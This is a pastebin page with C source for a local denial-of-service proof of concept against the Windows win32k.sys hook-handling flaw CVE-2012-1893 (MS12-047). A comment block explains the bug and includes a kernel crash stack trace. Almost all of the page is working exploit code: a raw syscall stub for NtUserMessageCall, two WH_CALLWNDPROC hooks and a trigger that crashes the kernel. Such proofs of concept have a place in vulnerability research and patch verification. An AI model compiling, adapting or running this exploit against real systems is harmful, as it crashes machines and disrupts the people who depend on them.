v 0. Pasted by Cr4sh as c at 2012-07-16 22:00:10 MSK and set expiration to never.

Paste will expire never.

  1. #include "stdafx.h"
  2.  
  3. /*
  5.     CVE-2012-1893 MS12-047 LOCAL DoS PoC   
  6.     By @d_olex (aka Cr4sh)
  8.     Vulnerability in win32k.sys allows us to call any next hook handler from the
  9.     win32k!fnHkINLPCWPRETEXSTRUCT() or win32k!fnHkINLPCWPEXSTRUCT() in unsafe way.
  10.    
  11.     Since win32k doesn't checks the next hook type -- access violation
  12.     occurs when we trying to call the next WH_CALLWNDPROC hook with the arguments
  13.     from the previous WH_CALLWNDPROCRET hook:
  15.     =====================================================================
  17.     Access violation - code c0000005 (!!! second chance !!!)
  18.     win32k!xxxHkCallHook+0x99:
  19.     bf800564 f6402405        test    byte ptr [eax+24h],5
  21.     ChildEBP RetAddr 
  22.     b18d16ac bf8328c5 win32k!xxxHkCallHook+0x99
  23.     b18d1724 bf8f6071 win32k!xxxCallHook2+0x25d
  24.     b18d1740 bf932b6d win32k!xxxCallNextHookEx+0x2d
  25.     b18d176c bf914749 win32k!fnHkINLPCWPRETEXSTRUCT+0x59
  26.     b18d17d8 bf80eef6 win32k!NtUserfnINOUTLPPOINT5+0x5c
  27.     b18d1810 8053d6d8 win32k!NtUserMessageCall+0xae
  28.     b18d1810 0042d65f nt!KiFastCallEntry+0xf8
  29.     0012fa80 0042d6d8 win32k_Hook!_NtUserMessageCall+0xf
  30.     0012fc7c 7e42b372 win32k_Hook!HookHandler_2+0x68
  31. */
  32.  
  33. #define WND_CLASS "CVE-2012-1893"
  34. #define WND_TITLE "CVE-2012-1893"
  35.  
  36. #define WND_W 500
  37. #define WND_H 500
  38.  
  39. HINSTANCE m_hInstance = NULL;
  40. HWND m_hWnd = NULL;
  41. HHOOK m_hHook_1 = NULL;
  42. HHOOK m_hHook_2 = NULL;
  43.  
  44. /*
  45.     NtUserMessageCall service number for Windows XP, change it
  46.     before running exploit on any others Windows versions.
  47. */
  48. DWORD SDT_NtUserMessageCall = 0x11cc;
  49.  
  50. __declspec(naked) LRESULT WINAPI _NtUserMessageCall(
  51.     HWND        hwnd,
  52.     UINT        msg,
  53.     WPARAM      wParam,
  54.     LPARAM      lParam,
  55.     ULONG_PTR   xParam,
  56.     DWORD       xpfnProc,
  57.     BOOL        bAnsi)
  58. {
  59.     __asm
  60.     {
  61.         mov     eax, SDT_NtUserMessageCall
  62.         test    eax, eax
  63.         jz      _failed
  64.         lea     edx, [esp + 4]
  65.         int     0x2e
  66.         retn    0x1c
  67.    
  68. _failed:
  69.         mov     eax, 0xc00000001
  70.         retn    0x1c
  71.     }
  72. }
  73.  
  74. #define TRIGGER()                                                                   \
  75.                                                                                     \
  76.     /* Trigger the vulnerability */                                                 \
  77.     char Something[0x100];                                                          \
  78.     ZeroMemory(Something, sizeof(Something));                                       \
  79.     _NtUserMessageCall(m_hWnd, 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
  80.  
  81. LRESULT CALLBACK HookHandler_1(int nCode, WPARAM wParam, LPARAM lParam)
  82. {
  83.     printf(__FUNCTION__"()\n");
  84.  
  85.     TRIGGER();
  86.  
  87.     return CallNextHookEx(m_hHook_1, nCode, wParam, lParam);
  88. }
  89.  
  90. LRESULT CALLBACK HookHandler_2(int nCode, WPARAM wParam, LPARAM lParam)
  91. {
  92.     printf(__FUNCTION__"()\n");
  93.  
  94.     TRIGGER();
  95.  
  96.     return CallNextHookEx(m_hHook_2, nCode, wParam, lParam);
  97. }
  98.  
  99. #define ID_SHOWMSG 1
  100.  
  101. LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
  102. {
  103.     switch (message)
  104.     {
  105.     case WM_CREATE:
  106.         {
  107.             m_hHook_1 = SetWindowsHookEx(
  108.                 WH_CALLWNDPROC,
  109.                 HookHandler_1,
  110.                 NULL,
  111.                 GetCurrentThreadId()
  112.             );
  113.             if (m_hHook_1 == NULL)
  114.             {
  115.                 printf("SetWindowsHookEx() ERROR %d\n", GetLastError());
  116.             }
  117.  
  118.             m_hHook_2 = SetWindowsHookEx(
  119.                 WH_CALLWNDPROC,
  120.                 HookHandler_2,
  121.                 NULL,
  122.                 GetCurrentThreadId()
  123.             );
  124.             if (m_hHook_2 == NULL)
  125.             {
  126.                 printf("SetWindowsHookEx() ERROR %d\n", GetLastError());
  127.             }
  128.  
  129.             break;
  130.         }
  131.  
  132.     case WM_COMMAND:
  133.         {
  134.             switch (wParam)
  135.             {
  136.             case ID_SHOWMSG:
  137.  
  138.                 MessageBoxA(0, __FUNCTION__, "", 0);
  139.  
  140.                 break;
  141.             }
  142.  
  143.             break;
  144.         }
  145.  
  146.     case WM_DESTROY:
  147.  
  148.         PostQuitMessage(0);
  149.         break;
  150.  
  151.     default:
  152.  
  153.         return DefWindowProc(hWnd, message, wParam, lParam);
  154.     }
  155.  
  156.     return 0;
  157. }
  158.  
  159. int _tmain(int argc, _TCHAR* argv[])
  160. {   
  161.     char Something[0x100];
  162.     ZeroMemory(Something, sizeof(Something));
  163.     _NtUserMessageCall(GetDesktopWindow(), 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
  164.  
  165.     WNDCLASSEX wcex;
  166.     ZeroMemory(&wcex, sizeof(wcex));
  167.     wcex.cbSize = sizeof(WNDCLASSEX);
  168.  
  169.     m_hInstance = (HINSTANCE)GetModuleHandle(NULL);
  170.  
  171.     wcex.style = CS_HREDRAW | CS_VREDRAW;
  172.     wcex.lpfnWndProc = WndProc;
  173.     wcex.hInstance = m_hInstance;   
  174.     wcex.lpszClassName = _T(WND_CLASS);
  175.     wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
  176.  
  177.     // register window class
  178.     if (RegisterClassEx(&wcex) == NULL)
  179.     {
  180.         printf("RegisterClassEx() ERROR %d\n", GetLastError());
  181.         goto end;
  182.     } 
  183.  
  184.     int x = (GetSystemMetrics(SM_CXSCREEN) - WND_W) / 2;
  185.     int y = (GetSystemMetrics(SM_CYSCREEN) - WND_H) / 2;
  186.  
  187.     // create new empty window
  188.     m_hWnd = CreateWindowEx(
  189.         WS_EX_CLIENTEDGE,
  190.         _T(WND_CLASS), _T(WND_TITLE),
  191.         WS_OVERLAPPEDWINDOW,
  192.         x, y, WND_W, WND_H,
  193.         NULL, NULL,
  194.         m_hInstance,
  195.         NULL
  196.     );
  197.     if (m_hWnd)
  198.     {
  199.         ShowWindow(m_hWnd, SW_SHOWNORMAL);
  200.         UpdateWindow(m_hWnd);
  201.  
  202.         // Main message loop
  203.         MSG Msg;
  204.         while (GetMessage(&Msg, NULL, 0, 0))
  205.         {
  206.             TranslateMessage(&Msg);
  207.             DispatchMessage(&Msg);
  208.         }
  209.  
  210.         ExitProcess(0);
  211.     }
  212.     else
  213.     {
  214.         printf("CreateWindow() ERROR %d\n", GetLastError());
  215.     }
  216.  
  217. end:
  218.  
  219.     printf("Press any key to quit...\n");
  220.     _getch();
  221.  
  222.     return 0;
  223. }


Editing is locked.